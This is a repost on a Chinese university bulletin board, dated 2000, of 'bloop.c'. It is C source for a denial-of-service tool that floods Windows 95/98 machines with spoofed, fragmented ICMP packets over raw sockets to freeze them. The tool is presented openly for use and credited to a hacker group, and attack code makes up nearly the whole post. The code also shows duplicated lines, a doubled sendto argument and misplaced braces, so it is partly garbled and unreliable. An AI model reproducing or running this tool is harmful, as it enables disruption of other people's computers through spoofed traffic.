荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: bstone (Sealed!), 信区: Hacker
标 题: bloop.c
发信站: BBS 荔园晨风站 (Mon Apr 10 21:03:51 2000), 转信
发信人: cloudsky (小四), 信区: Security
标 题: bloop.c
发信站: 武汉白云黄鹤站 (Mon Apr 10 11:23:53 2000), 站内信件
/* Simple denial of service attack against Windows98/95 Machines
Overview: Sends random spoofed ICMP packets similar to a weaker
protocol as of ssping or jolt.
Result: Freezes the users machine or a CPU usage will rise to extreme
lag potentiol. (c) Legion2000 Security Research , code may be
distributed - credit is greatfully given if so..
http://www.legion2000.org http://www.sekurity-net.com
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
void banner(void) {
printf("Bloop v 1.0\n\n");
printf("\n\n");
}
void usage(const char *progname) {
printf(" usage:\n");
printf("./bloop [src_ip] [dst_ip] [# of packets]\n",progname);
printf(" [ip_src] : ex: 205.56.78.0\n");
printf(" [ip_dst] : ex: 201.12.3.76\n");
printf(" [number] : 100\n");
printf("Legion2000 Security Research (c)\n");
}
int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) {
struct hostent *host;
memset(addr,0,sizeof(struct sockaddr_in));
addr->sin_family = AF_INET;
addr->sin_addr.s_addr = inet_addr(name);
if (addr->sin_addr.s_addr == -1) {
if (( host = gethostbyname(name) ) == NULL ) {
if (( host = gethostbyname(name) ) == NULL ) {
fprintf(stderr,"ERROR: Unable to resolve host %s\n",name);
return(-1);
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
}
addr->sin_port = htons(port);
return(0);
}
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
int send_winbomb(int socket,
unsigned long spoof_addr,
struct sockaddr_in *dest_addr) {
unsigned char *packet;
struct iphdr *ip;
struct icmphdr *icmp;
int rc;
packet = (unsigned char *)malloc(sizeof(struct iphdr) +
sizeof(struct icmphdr) + 8);
ip = (struct iphdr *)packet;
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
ip->ihl = 5;
ip->version = 4;
// ip->tos = 2;
ip->id = htons(1234);
ip->frag_off |= htons(0x2000);
// ip->tot_len = 0;
ip->ttl = 30;
ip->protocol = IPPROTO_ICMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum(ip, sizeof(struct iphdr));
icmp->type = 12;
icmp->code = 0;
icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1);
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + 1,0,
(struct sockaddr *)dest_addr,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
ip->frag_off = htons(8 >> 3);
ip->frag_off |= htons(0x2000);
ip->check = in_cksum(ip, sizeof(struct iphdr));
icmp->type = 0;
icmp->code = 0;
icmp->checksum = 0;
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + 8,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
free(packet);
return(0);
}
int main(int argc, char * *argv) {
struct sockaddr_in dest_addr;
unsigned int i,sock;
unsigned long src_addr;
banner();
banner();
if ((argc != 4)) {
usage(argv[0]);
return(-1);
}
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
fprintf(stderr,"ERROR: Opening raw socket.\n");
return(-1);
}
if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
src_addr = dest_addr.sin_addr.s_addr;
if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }
printf("Status: Connected....packets sent.\n",argv[0]);
for (i = 0;i < atoi(argv[3]);i++) {
if (send_winbomb(sock,
src_addr,
&dest_addr) == -1) {
fprintf(stderr,"ERROR: Unable to Connect To luser.\n");
return(-1);
}
usleep(10000);
if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
}
}
--
我问飘逝的风:来迟了?
风感慨:是的,他们已经宣战。
我问苏醒的大地:还有希望么?
大地揉了揉眼睛:还有,还有无数代的少年。
我问长空中的英魂:你们相信?
英魂带着笑意离去:相信,希望还在。
※ 来源:.武汉白云黄鹤站 bbs.whnet.edu.cn.[FROM: 203.207.226.124]
--
☆ 来源:.BBS 荔园晨风站 bbs.szu.edu.cn.[FROM: bbs@192.168.28.106]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店